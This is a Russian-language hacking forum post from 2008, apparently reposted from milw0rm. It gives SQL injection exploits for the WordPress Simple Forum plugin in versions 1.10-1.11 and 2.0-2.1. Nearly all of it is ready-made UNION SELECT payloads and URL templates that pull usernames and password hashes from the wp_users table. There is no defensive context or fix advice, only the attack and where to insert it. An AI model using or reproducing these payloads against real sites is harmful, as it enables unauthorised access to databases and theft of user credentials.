15.02.2008, 22:14
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
С нами:
10475029
Репутация:
135
|
|
Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability
example
Код:
http://xxxxx/forums?forum=xxxx&topic= (expliot)
EXPLOİT 1 :
Код:
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
EXPLOİT 2 :
Код:
SİMETİMES YOU CANT SEE (xxxx&topic) SOO USE THİS EXPLOİT AFTER forum=xxx(number)
example
Код:
www.xxxxx/forums?forum=1(expliot)
&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability
example :
Код:
http://www.xxx.com/sf-forum?forum=[exploit]
EXPLOIT 1 :
Код:
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
exploit 2 :
Код:
-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*
(с)milw0rm.com
Последний раз редактировалось FraiDex; 15.02.2008 в 22:19..
|
|
|